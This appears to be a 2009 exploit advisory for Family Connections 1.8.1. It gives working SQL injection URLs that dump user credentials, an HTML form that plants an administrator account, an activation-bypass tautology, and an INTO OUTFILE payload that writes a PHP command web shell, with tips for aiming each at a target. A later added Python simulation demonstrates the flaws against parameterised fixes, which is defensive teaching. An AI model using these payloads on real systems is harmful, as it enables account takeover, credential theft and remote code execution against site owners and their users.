Family Connections 1.8.1 Multiple Remote Vulnerabilities

2009-03-30 / 2009-03-31
Credit: Salvatore
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

*************************************************
Salvatore "drosophila" Fresta
*************************************************

[+] Application: Family Connection
[+] Version: 1.8.1
[+] Website: http://www.familycms.com

[+] Bugs:
    [A] Multiple SQL Injection
    [B] Create Admin User
    [C] Blind SQL Injection

[+] Exploitation: Remote
[+] Date: 25 Mar 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com

*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix

*************************************************

[+] Bugs

- [A] Multiple SQL Injection

  [-] Requisites: magic_quotes_gpc = on/off

  These bugs allow a registered user to read the username and password
  hash of every registered user. The recipes.php and home.php injections
  sit in a numeric context and need no quote, so magic_quotes_gpc does
  not stop them; the addressbook.php payload closes a string literal and
  therefore needs magic_quotes_gpc = off.

- [B] Create Admin User

  [-] Requisites: magic_quotes_gpc = off
  [-] File affected: register.php, activate.php

  This bug allows an unauthenticated visitor to create an account with
  administrator privileges: the value of the "year" field is concatenated
  into the registration INSERT unescaped, so a crafted value closes the
  legitimate row and appends a second row of the attacker's choosing.

- [C] Blind SQL Injection

  [-] Requisites: magic_quotes_gpc = off
  [-] File affected: lostpw.php

  The "email" field of the lost-password form is injectable. The payload
  below goes beyond data extraction and uses INTO OUTFILE to write a PHP
  shell into the web root, which additionally requires the application's
  MySQL account to hold the FILE privilege and the target directory to be
  writable by the MySQL server process.

*************************************************

[+] Code

- [A] Multiple SQL Injection

  http://www.site.com/path/addressbook.php?letter=-1%25' UNION ALL SELECT 1,2,NULL,username,5,password,email FROM fcms_users%23

  http://www.site.com/path/recipes.php?category=1&id=1 UNION SELECT 1,2,username,password,5,6 FROM fcms_users

  http://www.site.com/path/home.php?poll_id=-1 UNION ALL SELECT 1,NULL,3,CONCAT(username, 0x3a, password) FROM fcms_users%23

  (%25 and %23 are the URL-encoded "%" and "#"; the "#" comments out the
  remainder of the original query, and each UNION lists exactly as many
  columns as the query it is appended to.)

- [B] Create Admin User

  <html>
  <head>
  <title>Family Connection 1.8.1 Create Admin User Exploit</title>
  </head>
  <body>
  <p>This exploit creates a user with administrator privileges using the following information:<br>
  Username: root<br>
  Password: toor<br></p>
  <form action="http://localhost/fcms/register.php" method="POST">
  <input type="hidden" name="username" value="blabla">
  <input type="hidden" name="password" value="blabla">
  <input type="hidden" name="email" value="blabla@blabla.blabla">
  <input type="hidden" name="fname" value="blabla">
  <input type="hidden" name="lname" value="blabla">
  <input type="hidden" name="year" value="00-00-000','fakeuser','fakepassword'), (1, NOW(), 'root', 'root', 'root@owned.com', '00-00-00', 'root', '7b24afc8bc80e548d66c4e7ff72171c5')#'">
  <input type="submit" name="submit" value="Exploit">
  </form>
  </body>
  </html>

  The "year" value terminates the legitimate row, appends a second row with
  access level 1 and the MD5 of "toor" as its password hash, and comments
  out the rest of the statement with "#". Point the form action at the
  target's register.php before submitting.

  To activate accounts:

  http://www.site.com/path/activate.php?uid=1 or 1=1&code=

  The tautology in uid makes the activation apply to every pending account,
  the planted root account included, without knowing its activation code.

- [C] Blind SQL Injection

  POST /path/lostpw.php HTTP/1.1
  Host: www.site.com
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 193

  email=-1' UNION ALL SELECT '<?php echo "<pre>"; system($_GET[cmd]); echo "</pre><br><br>";?>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 INTO OUTFILE '/var/www/htdocs/path/rce.php'#

  The 21 zeros pad the UNION to the column count of the original query; the
  first column carries the PHP source that INTO OUTFILE writes to disk.
  Adjust the Content-Length to the body actually sent and the output path
  to the target's document root.

  To execute commands:

  http://www.site.com/path/rce.php?cmd=ls

*************************************************

[+] Fix

No fix at the time of writing; see the 1.8.2 release links under References.

*************************************************
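The two injection mechanics above, bug [B]'s second INSERT row through the "year" field and bug [A]'s UNION read of fcms_users, reproduced as an added example that is not part of this advisory or of the Family Connections code base. It runs against an in-memory SQLite database with an assumed table layout (the fcms_users column order is inferred from the register.php payload; fcms_address is a guess at a seven-column address-book query shaped to fit the addressbook.php payload), registers a stand-in NOW() and emulates MySQL's "#" line comment by truncation because SQLite has neither, and places each string-built query beside a parameterised rewrite. The sample accounts and address entry are constructed.

```python
# Added simulation, not code from the advisory or from Family Connections.
# Reproduces bugs [A] and [B] against SQLite with an ASSUMED schema, beside
# parameterised rewrites. MySQL stand-ins: NOW() is registered as a user
# function, and the '#' line comment is emulated by truncating the statement.
import hashlib
import sqlite3

# Assumed layouts. fcms_users column order is inferred from the advisory's
# register.php payload; fcms_address is a seven-column guess matching the
# addressbook.php UNION payload. The real schemas may differ.
SCHEMA = """
CREATE TABLE fcms_users (access INTEGER, joindate TEXT, fname TEXT, lname TEXT,
                         email TEXT, birthday TEXT, username TEXT, password TEXT);
CREATE TABLE fcms_address (id INTEGER, fname TEXT, lname TEXT, address TEXT,
                           city TEXT, phone TEXT, email TEXT);
"""

# Payloads copied from the advisory ('%25' in the URL decodes to '%').
ADMIN_PAYLOAD = ("00-00-000','fakeuser','fakepassword'), "
                 "(1, NOW(), 'root', 'root', 'root@owned.com', '00-00-00', "
                 "'root', '7b24afc8bc80e548d66c4e7ff72171c5')#")
LETTER_PAYLOAD = ("-1%' UNION ALL SELECT 1,2,NULL,username,5,password,email "
                  "FROM fcms_users#")


def md5hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def connect():
    """Fresh database with one legitimate admin and one address-book entry."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("NOW", 0, lambda: "2009-03-25 00:00:00")  # NOW() stand-in
    conn.executescript(SCHEMA)
    conn.execute("INSERT INTO fcms_users VALUES (1, NOW(), ?, ?, ?, ?, ?, ?)",
                 ("Alice", "Admin", "alice@example.org", "01-01-1970",
                  "alice", md5hex("s3cret")))            # constructed account
    conn.execute("INSERT INTO fcms_address VALUES (?, ?, ?, ?, ?, ?, ?)",
                 (1, "Bob", "Baker", "1 Main St", "Springfield",
                  "555-0100", "bob@example.org"))         # constructed entry
    return conn


def strip_mysql_comment(sql):
    """Emulate MySQL's '#' line comment, which SQLite lacks. Adequate here
    because neither payload carries a '#' inside a quoted string."""
    return sql.split("#", 1)[0]


def register_vulnerable(conn, fname, lname, email, year, username, password):
    """INSERT built by string concatenation, as the vulnerable register.php does."""
    sql = ("INSERT INTO fcms_users VALUES "
           f"(0, NOW(), '{fname}', '{lname}', '{email}', '{year}', "
           f"'{username}', '{md5hex(password)}')")
    conn.execute(strip_mysql_comment(sql))


def register_fixed(conn, fname, lname, email, year, username, password):
    """Same statement with bound parameters: the payload is stored as a birthday."""
    conn.execute("INSERT INTO fcms_users VALUES (0, NOW(), ?, ?, ?, ?, ?, ?)",
                 (fname, lname, email, year, username, md5hex(password)))


def addressbook_vulnerable(conn, letter):
    """Surname filter interpolated into a LIKE pattern (assumed query shape)."""
    sql = ("SELECT id, fname, lname, address, city, phone, email "
           f"FROM fcms_address WHERE lname LIKE '{letter}%'")
    return conn.execute(strip_mysql_comment(sql)).fetchall()


def addressbook_fixed(conn, letter):
    """Bound LIKE pattern; LIKE metacharacters are escaped as well, otherwise a
    bare '%' still lists every entry."""
    pattern = (letter.replace("\\", "\\\\").replace("%", "\\%")
               .replace("_", "\\_") + "%")
    return conn.execute("SELECT id, fname, lname, address, city, phone, email "
                        "FROM fcms_address WHERE lname LIKE ? ESCAPE '\\'",
                        (pattern,)).fetchall()


def admin_usernames(conn):
    return [r[0] for r in conn.execute(
        "SELECT username FROM fcms_users WHERE access = 1 ORDER BY username")]


def demo():
    """Returns (admins after vulnerable register, admins after fixed register,
    rows leaked by the vulnerable address book, rows from the fixed one)."""
    vuln, fixed = connect(), connect()
    args = ("blabla", "blabla", "blabla@blabla.blabla", ADMIN_PAYLOAD,
            "blabla", "blabla")                          # the exploit form's fields
    register_vulnerable(vuln, *args)
    register_fixed(fixed, *args)
    return (admin_usernames(vuln), admin_usernames(fixed),
            addressbook_vulnerable(vuln, LETTER_PAYLOAD),
            addressbook_fixed(fixed, LETTER_PAYLOAD))


if __name__ == "__main__":
    a_vuln, a_fixed, leaked, clean = demo()
    print("admins (vulnerable):", a_vuln)   # ['alice', 'root']
    print("admins (fixed):     ", a_fixed)  # ['alice']
    print("leaked via UNION:   ", [(r[3], r[5]) for r in leaked])
    print("fixed address book: ", clean)    # []
```

The vulnerable registration ends with two administrators (alice and the planted root, whose stored hash is the MD5 of "toor" carried in the payload), and the vulnerable address book hands back every username and hash in the columns where a surname and phone number belong. The parameterised versions store the entire payload as a birthday and match no surname. In the real application the equivalent fix is mysqli or PDO prepared statements for every query that takes request data; magic_quotes_gpc is not a substitute, since it leaves numeric contexts such as recipes.php's id untouched and was removed in PHP 5.4.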

References:

http://www.securityfocus.com/bid/34297
http://www.securityfocus.com/archive/1/archive/1/502272/100/0/threaded
http://www.milw0rm.com/exploits/8319
http://www.familycms.com/blog/2009/03/fcms-182-released/
http://sourceforge.net/tracker/?func=detail&aid=2722736&group_id=189733&atid=930513
http://sourceforge.net/project/shownotes.php?release_id=672266
http://secunia.com/advisories/34503


Copyright 2024, cxsecurity.com